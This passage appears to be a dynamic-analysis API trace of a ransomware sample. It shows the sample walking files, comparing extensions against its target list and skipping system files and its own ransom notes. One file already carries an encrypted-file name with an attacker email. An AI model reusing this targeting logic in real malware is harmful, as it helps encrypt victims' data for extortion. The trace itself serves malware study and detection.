lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0263.658] lstrlenW (lpString=".exr") returned 4 [0263.658] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0263.658] lstrlenW (lpString=".f4v") returned 4 [0263.658] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0263.658] lstrlenW (lpString=".fido") returned 5 [0263.658] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0263.658] lstrlenW (lpString=".flm") returned 4 [0263.658] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0263.658] lstrlenW (lpString=".flv") returned 4 [0263.658] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".frm") returned 4 [0263.659] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".fxg") returned 4 [0263.659] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".geo") returned 4 [0263.659] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".gif") returned 4 [0263.659] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".grs") returned 4 [0263.659] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".gz") returned 3 [0263.659] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0263.659] lstrlenW (lpString=".h") returned 2 [0263.659] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0263.659] lstrlenW (lpString=".hdr") returned 4 [0263.659] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".hpp") returned 4 [0263.659] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".hta") returned 4 [0263.659] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".htc") returned 4 [0263.659] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".htm") returned 4 [0263.659] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".html") returned 5 [0263.659] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0263.659] lstrlenW (lpString=".icb") returned 4 [0263.659] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".ics") returned 4 [0263.659] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0263.659] lstrlenW (lpString=".iff") returned 4 [0263.660] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0263.660] lstrlenW (lpString=".inc") returned 4 [0263.660] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0263.660] lstrlenW (lpString=".indd") returned 5 [0263.660] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0263.660] lstrlenW (lpString=".ini") returned 4 [0263.660] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0263.660] lstrlenW (lpString="desktop.ini") returned 11 [0263.660] lstrlenW (lpString=".USA") returned 4 [0263.660] lstrcmpiW (lpString1=".USA", lpString2=".ini") returned 1 [0263.660] lstrlenW (lpString="desktop.ini") returned 11 [0263.660] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1 [0263.660] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1 [0263.660] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1 [0263.660] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1 [0263.660] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1 [0263.660] lstrcmpiW (lpString1="FILES ENCRYPTED.txt", lpString2="desktop.ini") returned 1 [0263.660] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1 [0263.660] lstrcmpiW (lpString1="payload.exe", lpString2="desktop.ini") returned 1 [0263.660] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.660] FindNextFileW (in: hFindFile=0x6199f8, lpFindFileData=0x30ff808 | out: lpFindFileData=0x30ff808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x12827b30, ftCreationTime.dwHighDateTime=0x1d53e5f, ftLastAccessTime.dwLowDateTime=0x12827b30, ftLastAccessTime.dwHighDateTime=0x1d53e5f, ftLastWriteTime.dwLowDateTime=0x1284dc90, ftLastWriteTime.dwHighDateTime=0x1d53e5f, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA", cAlternateFileName="DESKTO~1.USA")) returned 1 [0263.660] lstrlenW (lpString="desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA") returned 52 [0263.660] lstrlenW (lpString=".1cd") returned 4 [0263.660] lstrcmpiW (lpString1=".1cd", lpString2=".USA") returned -1 [0263.660] lstrlenW (lpString=".3ds") returned 4 [0263.660] lstrcmpiW (lpString1=".3ds", lpString2=".USA") returned -1 [0263.660] lstrlenW (lpString=".3fr") returned 4 [0263.660] lstrcmpiW (lpString1=".3fr", lpString2=".USA") returned -1 [0263.661] lstrlenW (lpString=".3g2") returned 4 [0263.661] lstrcmpiW (lpString1=".3g2", lpString2=".USA") returned -1 [0263.661] lstrlenW (lpString=".3gp") returned 4 [0263.661] lstrcmpiW (lpString1=".3gp", lpString2=".USA") returned -1 [0263.661] lstrlenW (lpString=".7z") returned 3 [0263.661] lstrcmpiW (lpString1=".7z", lpString2="USA") returned -1 [0263.661] lstrlenW (lpString=".accda") returned 6 [0263.661] lstrcmpiW (lpString1=".accda", lpString2="m].USA") returned -1 [0263.661] lstrlenW (lpString=".accdb") returned 6 [0263.661] lstrcmpiW (lpString1=".accdb", lpString2="m].USA") returned -1 [0263.661] lstrlenW (lpString=".accdc") returned 6 [0263.661] lstrcmpiW (lpString1=".accdc", lpString2="m].USA") returned -1 [0263.661] lstrlenW (lpString=".accde") returned 6 [0263.661] lstrcmpiW (lpString1=".accde", lpString2="m].USA") returned -1 [0263.661] lstrlenW (lpString=".accdt") returned 6 [0263.661] lstrcmpiW (lpString1=".accdt", lpString2="m].USA") returned -1 [0263.661] lstrlenW (lpString=".accdw") returned 6 [0263.661] lstrcmpiW (lpString1=".accdw", lpString2="m].USA") returned -1 [0263.661] lstrlenW (lpString=".adb") returned 4 [0263.661] lstrcmpiW (lpString1=".adb", lpString2=".USA") returned -1 [0263.661] lstrlenW (lpString=".adp") returned 4 [0263.661] lstrcmpiW (lpString1=".adp", lpString2=".USA") returned -1 [0263.661] lstrlenW (lpString=".ai") returned 3 [0263.661] lstrcmpiW (lpString1=".ai", lpString2="USA") returned -1 [0263.661] lstrlenW (lpString=".ai3") returned 4 [0263.661] lstrcmpiW (lpString1=".ai3", lpString2=".USA") returned -1 [0263.661] lstrlenW (lpString=".ai4") returned 4 [0263.661] lstrcmpiW (lpString1=".ai4", lpString2=".USA") returned -1 [0263.670] lstrlenW (lpString=".ai5") returned 4 [0263.670] lstrcmpiW (lpString1=".ai5", lpString2=".USA") returned -1 [0263.670] lstrlenW (lpString=".ai6") returned 4 [0263.670] lstrcmpiW (lpString1=".ai6", lpString2=".USA") returned -1 [0263.670] lstrlenW (lpString=".ai7") returned 4 [0263.670] lstrcmpiW (lpString1=".ai7", lpString2=".USA") returned -1 [0263.670] lstrlenW (lpString=".ai8") returned 4 [0263.670] lstrcmpiW (lpString1=".ai8", lpString2=".USA") returned -1 [0263.670] lstrlenW (lpString=".anim") returned 5 [0263.670] lstrcmpiW (lpString1=".anim", lpString2="].USA") returned -1 [0263.670] lstrlenW (lpString=".arw") returned 4 [0263.670] lstrcmpiW (lpString1=".arw", lpString2=".USA") returned -1 [0263.670] lstrlenW (lpString=".as") returned 3 [0263.670] lstrcmpiW (lpString1=".as", lpString2="USA") returned -1 [0263.670] lstrlenW (lpString=".asa") returned 4 [0263.670] lstrcmpiW (lpString1=".asa", lpString2=".USA") returned -1 [0263.670] lstrlenW (lpString=".asc") returned 4 [0263.670] lstrcmpiW (lpString1=".asc", lpString2=".USA") returned -1 [0263.670] lstrlenW (lpString=".ascx") returned 5 [0263.670] lstrcmpiW (lpString1=".ascx", lpString2="].USA") returned -1 [0263.670] lstrlenW (lpString=".asm") returned 4 [0263.670] lstrcmpiW (lpString1=".asm", lpString2=".USA") returned -1 [0263.671] lstrlenW (lpString=".asmx") returned 5 [0263.671] lstrcmpiW (lpString1=".asmx", lpString2="].USA") returned -1 [0263.671] lstrlenW (lpString=".asp") returned 4 [0263.671] lstrcmpiW (lpString1=".asp", lpString2=".USA") returned -1 [0263.671] lstrlenW (lpString=".aspx") returned 5 [0263.671] lstrcmpiW (lpString1=".aspx", lpString2="].USA") returned -1 [0263.671] lstrlenW (lpString=".asr") returned 4 [0263.671] lstrcmpiW (lpString1=".asr", lpString2=".USA") returned -1 [0263.671] lstrlenW (lpString=".asx") returned 4 [0263.671] lstrcmpiW (lpString1=".asx", lpString2=".USA") returned -1 [0263.671] lstrlenW (lpString=".avi") returned 4 [0263.671] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0263.671] lstrlenW (lpString=".avs") returned 4 [0263.671] lstrcmpiW (lpString1=".avs", lpString2=".USA") returned -1 [0263.671] lstrlenW (lpString=".backup") returned 7 [0263.671] lstrcmpiW (lpString1=".backup", lpString2="om].USA") returned -1 [0263.671] lstrlenW (lpString=".bak") returned 4 [0263.671] lstrcmpiW (lpString1=".bak", lpString2=".USA") returned -1 [0263.671] lstrlenW (lpString=".bay") returned 4 [0263.671] lstrcmpiW (lpString1=".bay", lpString2=".USA") returned -1 [0263.671] lstrlenW (lpString=".bd") returned 3 [0263.671] lstrcmpiW (lpString1=".bd", lpString2="USA") returned -1 [0263.671] lstrlenW (lpString=".bin") returned 4 [0263.671] lstrcmpiW (lpString1=".bin", lpString2=".USA") returned -1 [0263.671] lstrlenW (lpString=".bmp") returned 4 [0263.671] lstrcmpiW (lpString1=".bmp", lpString2=".USA") returned -1 [0263.671] lstrlenW (lpString=".bz2") returned 4 [0263.671] lstrcmpiW (lpString1=".bz2", lpString2=".USA") returned -1 [0263.671] lstrlenW (lpString=".c") returned 2 [0263.671] lstrcmpiW (lpString1=".c", lpString2="SA") returned -1 [0263.671] lstrlenW (lpString=".cdr") returned 4 [0263.672] lstrcmpiW (lpString1=".cdr", lpString2=".USA") returned -1 [0263.672] lstrlenW (lpString=".cer") returned 4 [0263.672] lstrcmpiW (lpString1=".cer", lpString2=".USA") returned -1 [0263.672] lstrlenW (lpString=".cf") returned 3 [0263.672] lstrcmpiW (lpString1=".cf", lpString2="USA") returned -1 [0263.672] lstrlenW (lpString=".cfc") returned 4 [0263.672] lstrcmpiW (lpString1=".cfc", lpString2=".USA") returned -1 [0263.672] lstrlenW (lpString=".cfm") returned 4 [0263.672] lstrcmpiW (lpString1=".cfm", lpString2=".USA") returned -1 [0263.672] lstrlenW (lpString=".cfml") returned 5 [0263.672] lstrcmpiW (lpString1=".cfml", lpString2="].USA") returned -1 [0263.672] lstrlenW (lpString=".cfu") returned 4 [0263.672] lstrcmpiW (lpString1=".cfu", lpString2=".USA") returned -1 [0263.672] lstrlenW (lpString=".chm") returned 4 [0263.672] lstrcmpiW (lpString1=".chm", lpString2=".USA") returned -1 [0263.672] lstrlenW (lpString=".cin") returned 4 [0263.672] lstrcmpiW (lpString1=".cin", lpString2=".USA") returned -1 [0263.672] lstrlenW (lpString=".class") returned 6 [0263.672] lstrcmpiW (lpString1=".class", lpString2="m].USA") returned -1 [0263.672] lstrlenW (lpString=".clx") returned 4 [0263.672] lstrcmpiW (lpString1=".clx", lpString2=".USA") returned -1 [0263.672] lstrlenW (lpString=".config") returned 7 [0263.672] lstrcmpiW (lpString1=".config", lpString2="om].USA") returned -1 [0263.672] lstrlenW (lpString=".cpp") returned 4 [0263.672] lstrcmpiW (lpString1=".cpp", lpString2=".USA") returned -1 [0263.672] lstrlenW (lpString=".cr2") returned 4 [0263.672] lstrcmpiW (lpString1=".cr2", lpString2=".USA") returned -1 [0263.672] lstrlenW (lpString=".crt") returned 4 [0263.672] lstrcmpiW (lpString1=".crt", lpString2=".USA") returned -1 [0263.672] lstrlenW (lpString=".crw") returned 4 [0263.672] lstrcmpiW (lpString1=".crw", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".cs") returned 3 [0263.673] lstrcmpiW (lpString1=".cs", lpString2="USA") returned -1 [0263.673] lstrlenW (lpString=".css") returned 4 [0263.673] lstrcmpiW (lpString1=".css", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".csv") returned 4 [0263.673] lstrcmpiW (lpString1=".csv", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".cub") returned 4 [0263.673] lstrcmpiW (lpString1=".cub", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".dae") returned 4 [0263.673] lstrcmpiW (lpString1=".dae", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".dat") returned 4 [0263.673] lstrcmpiW (lpString1=".dat", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".db") returned 3 [0263.673] lstrcmpiW (lpString1=".db", lpString2="USA") returned -1 [0263.673] lstrlenW (lpString=".dbf") returned 4 [0263.673] lstrcmpiW (lpString1=".dbf", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".dbx") returned 4 [0263.673] lstrcmpiW (lpString1=".dbx", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".dc3") returned 4 [0263.673] lstrcmpiW (lpString1=".dc3", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".dcm") returned 4 [0263.673] lstrcmpiW (lpString1=".dcm", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".dcr") returned 4 [0263.673] lstrcmpiW (lpString1=".dcr", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".der") returned 4 [0263.673] lstrcmpiW (lpString1=".der", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".dib") returned 4 [0263.673] lstrcmpiW (lpString1=".dib", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".dic") returned 4 [0263.673] lstrcmpiW (lpString1=".dic", lpString2=".USA") returned -1 [0263.673] lstrlenW (lpString=".dif") returned 4 [0263.674] lstrcmpiW (lpString1=".dif", lpString2=".USA") returned -1 [0263.674] lstrlenW (lpString=".divx") returned 5 [0263.674] lstrcmpiW (lpString1=".divx", lpString2="].USA") returned -1 [0263.674] lstrlenW (lpString=".djvu") returned 5 [0263.674] lstrcmpiW (lpString1=".djvu", lpString2="].USA") returned -1 [0263.674] lstrlenW (lpString=".dng") returned 4 [0263.674] lstrcmpiW (lpString1=".dng", lpString2=".USA") returned -1 [0263.674] lstrlenW (lpString=".doc") returned 4 [0263.674] lstrcmpiW (lpString1=".doc", lpString2=".USA") returned -1 [0263.674] lstrlenW (lpString=".docm") returned 5 [0263.674] lstrcmpiW (lpString1=".docm", lpString2="].USA") returned -1 [0263.674] lstrlenW (lpString=".docx") returned 5 [0263.674] lstrcmpiW (lpString1=".docx", lpString2="].USA") returned -1 [0263.674] lstrlenW (lpString=".dot") returned 4 [0263.674] lstrcmpiW (lpString1=".dot", lpString2=".USA") returned -1 [0263.674] lstrlenW (lpString=".dotm") returned 5 [0263.674] lstrcmpiW (lpString1=".dotm", lpString2="].USA") returned -1 [0263.674] lstrlenW (lpString=".dotx") returned 5 [0263.674] lstrcmpiW (lpString1=".dotx", lpString2="].USA") returned -1 [0263.674] lstrlenW (lpString=".dpx") returned 4 [0263.674] lstrcmpiW (lpString1=".dpx", lpString2=".USA") returned -1 [0263.674] lstrlenW (lpString=".dqy") returned 4 [0263.674] lstrcmpiW (lpString1=".dqy", lpString2=".USA") returned -1 [0263.674] lstrlenW (lpString=".dsn") returned 4 [0263.674] lstrcmpiW (lpString1=".dsn", lpString2=".USA") returned -1 [0263.674] lstrlenW (lpString=".dt") returned 3 [0263.674] lstrcmpiW (lpString1=".dt", lpString2="USA") returned -1 [0263.674] lstrlenW (lpString=".dtd") returned 4 [0263.674] lstrcmpiW (lpString1=".dtd", lpString2=".USA") returned -1 [0263.674] lstrlenW (lpString=".dwg") returned 4 [0263.674] lstrcmpiW (lpString1=".dwg", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".dwt") returned 4 [0263.675] lstrcmpiW (lpString1=".dwt", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".dx") returned 3 [0263.675] lstrcmpiW (lpString1=".dx", lpString2="USA") returned -1 [0263.675] lstrlenW (lpString=".dxf") returned 4 [0263.675] lstrcmpiW (lpString1=".dxf", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".edml") returned 5 [0263.675] lstrcmpiW (lpString1=".edml", lpString2="].USA") returned -1 [0263.675] lstrlenW (lpString=".efd") returned 4 [0263.675] lstrcmpiW (lpString1=".efd", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".elf") returned 4 [0263.675] lstrcmpiW (lpString1=".elf", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".emf") returned 4 [0263.675] lstrcmpiW (lpString1=".emf", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".emz") returned 4 [0263.675] lstrcmpiW (lpString1=".emz", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".epf") returned 4 [0263.675] lstrcmpiW (lpString1=".epf", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".eps") returned 4 [0263.675] lstrcmpiW (lpString1=".eps", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".epsf") returned 5 [0263.675] lstrcmpiW (lpString1=".epsf", lpString2="].USA") returned -1 [0263.675] lstrlenW (lpString=".epsp") returned 5 [0263.675] lstrcmpiW (lpString1=".epsp", lpString2="].USA") returned -1 [0263.675] lstrlenW (lpString=".erf") returned 4 [0263.675] lstrcmpiW (lpString1=".erf", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".exr") returned 4 [0263.675] lstrcmpiW (lpString1=".exr", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".f4v") returned 4 [0263.675] lstrcmpiW (lpString1=".f4v", lpString2=".USA") returned -1 [0263.675] lstrlenW (lpString=".fido") returned 5 [0263.675] lstrcmpiW (lpString1=".fido", lpString2="].USA") returned -1 [0263.676] lstrlenW (lpString=".flm") returned 4 [0263.676] lstrcmpiW (lpString1=".flm", lpString2=".USA") returned -1 [0263.676] lstrlenW (lpString=".flv") returned 4 [0263.676] lstrcmpiW (lpString1=".flv", lpString2=".USA") returned -1 [0263.676] lstrlenW (lpString=".frm") returned 4 [0263.676] lstrcmpiW (lpString1=".frm", lpString2=".USA") returned -1 [0265.308] FindNextFileW (in: hFindFile=0x59b148, lpFindFileData=0x30ff094 | out: lpFindFileData=0x30ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.308] FindNextFileW (in: hFindFile=0x59b148, lpFindFileData=0x30ff094 | out: lpFindFileData=0x30ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cace83, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70cace83, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x303d, dwReserved0=0x0, dwReserved1=0x0, cFileName="babyblue.png", cAlternateFileName="")) returned 1 [0265.308] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.308] lstrcmpiW (lpString1=".3ds", lpString2=".png") returned -1 [0265.308] lstrcmpiW (lpString1=".3fr", lpString2=".png") returned -1 [0265.308] lstrcmpiW (lpString1=".3g2", lpString2=".png") returned -1 [0265.308] lstrcmpiW (lpString1=".3gp", lpString2=".png") returned -1 [0265.308] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.308] lstrcmpiW (lpString1=".accda", lpString2="ue.png") returned -1 [0265.309] lstrcmpiW (lpString1=".accdb", lpString2="ue.png") returned -1 [0265.309] lstrcmpiW (lpString1=".accdc", lpString2="ue.png") returned -1 [0265.309] lstrcmpiW (lpString1=".accde", lpString2="ue.png") returned -1 [0265.309] lstrcmpiW (lpString1=".accdt", lpString2="ue.png") returned -1 [0265.309] lstrcmpiW (lpString1=".accdw", lpString2="ue.png") returned -1 [0265.309] lstrcmpiW (lpString1=".adb", lpString2=".png") returned -1 [0265.309] lstrcmpiW (lpString1=".adp", lpString2=".png") returned -1 [0265.309] lstrcmpiW (lpString1=".ai", lpString2="png") returned -1 [0265.309] lstrcmpiW (lpString1=".ai3", lpString2=".png") returned -1 [0265.309] lstrcmpiW (lpString1=".ai4", lpString2=".png") returned -1 [0265.309] lstrcmpiW (lpString1=".ai5", lpString2=".png") returned -1 [0265.309] lstrcmpiW (lpString1=".ai6", lpString2=".png") returned -1 [0265.309] lstrcmpiW (lpString1=".ai7", lpString2=".png") returned -1 [0265.309] lstrcmpiW (lpString1=".ai8", lpString2=".png") returned -1 [0265.309] lstrcmpiW (lpString1=".anim", lpString2="e.png") returned -1 [0265.309] lstrcmpiW (lpString1=".arw", lpString2=".png") returned -1 [0265.309] lstrcmpiW (lpString1=".as", lpString2="png") returned -1 [0265.309] lstrcmpiW (lpString1=".asa", lpString2=".png") returned -1 [0265.309] lstrcmpiW (lpString1=".asc", lpString2=".png") returned -1 [0265.309] lstrcmpiW (lpString1=".ascx", lpString2="e.png") returned -1 [0265.310] lstrcmpiW (lpString1=".asm", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".asmx", lpString2="e.png") returned -1 [0265.310] lstrcmpiW (lpString1=".asp", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".aspx", lpString2="e.png") returned -1 [0265.310] lstrcmpiW (lpString1=".asr", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".asx", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".avi", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".avs", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".backup", lpString2="lue.png") returned -1 [0265.310] lstrcmpiW (lpString1=".bak", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".bay", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".bd", lpString2="png") returned -1 [0265.310] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".bmp", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".c", lpString2="ng") returned -1 [0265.310] lstrcmpiW (lpString1=".cdr", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".cer", lpString2=".png") returned -1 [0265.310] lstrcmpiW (lpString1=".cf", lpString2="png") returned -1 [0265.310] lstrcmpiW (lpString1=".cfc", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".cfm", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".cfml", lpString2="e.png") returned -1 [0265.311] lstrcmpiW (lpString1=".cfu", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".chm", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".cin", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".class", lpString2="ue.png") returned -1 [0265.311] lstrcmpiW (lpString1=".clx", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".config", lpString2="lue.png") returned -1 [0265.311] lstrcmpiW (lpString1=".cpp", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".cr2", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".crt", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".crw", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".cs", lpString2="png") returned -1 [0265.311] lstrcmpiW (lpString1=".css", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".csv", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".cub", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".dae", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".dat", lpString2=".png") returned -1 [0265.311] lstrcmpiW (lpString1=".db", lpString2="png") returned -1 [0265.311] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".dbx", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".dc3", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".dcm", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".dcr", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".der", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".dib", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".dic", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".dif", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".divx", lpString2="e.png") returned -1 [0265.312] lstrcmpiW (lpString1=".djvu", lpString2="e.png") returned -1 [0265.312] lstrcmpiW (lpString1=".dng", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".docm", lpString2="e.png") returned -1 [0265.312] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0265.312] lstrcmpiW (lpString1=".dot", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".dotm", lpString2="e.png") returned -1 [0265.312] lstrcmpiW (lpString1=".dotx", lpString2="e.png") returned -1 [0265.312] lstrcmpiW (lpString1=".dpx", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".dqy", lpString2=".png") returned -1 [0265.312] lstrcmpiW (lpString1=".dsn", lpString2=".png") returned -1 [0265.313] lstrcmpiW (lpString1=".dt", lpString2="png") returned -1 [0265.313] lstrcmpiW (lpString1=".dtd", lpString2=".png") returned -1 [0265.313] lstrcmpiW (lpString1=".dwg", lpString2=".png") returned -1 [0265.313] lstrcmpiW (lpString1=".dwt", lpString2=".png") returned -1 [0265.313] lstrcmpiW (lpString1=".dx", lpString2="png") returned -1 [0265.313] lstrcmpiW (lpString1=".dxf", lpString2=".png") returned -1 [0265.313] lstrcmpiW (lpString1=".edml", lpString2="e.png") returned -1 [0265.313] lstrcmpiW (lpString1=".efd", lpString2=".png") returned -1 [0265.313] lstrcmpiW (lpString1=".elf", lpString2=".png") returned -1 [0265.313] lstrcmpiW (lpString1=".emf", lpString2=".png") returned -1 [0265.313] lstrcmpiW (lpString1=".emz", lpString2=".png") returned -1 [0265.313] lstrcmpiW (lpString1=".epf", lpString2=".png") returned -1 [0265.313] lstrcmpiW (lpString1=".eps", lpString2=".png") returned -1 [0265.313] lstrcmpiW (lpString1=".epsf", lpString2="e.png") returned -1 [0265.314] lstrcmpiW (lpString1=".epsp", lpString2="e.png") returned -1 [0265.314] lstrcmpiW (lpString1=".erf", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".exr", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".f4v", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".fido", lpString2="e.png") returned -1 [0265.314] lstrcmpiW (lpString1=".flm", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".flv", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".fxg", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".geo", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".gif", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".grs", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".gz", lpString2="png") returned -1 [0265.314] lstrcmpiW (lpString1=".h", lpString2="ng") returned -1 [0265.314] lstrcmpiW (lpString1=".hdr", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".hpp", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0265.314] lstrcmpiW (lpString1=".htc", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".htm", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".html", lpString2="e.png") returned -1 [0265.315] lstrcmpiW (lpString1=".icb", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".iff", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".inc", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".indd", lpString2="e.png") returned -1 [0265.315] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".iqy", 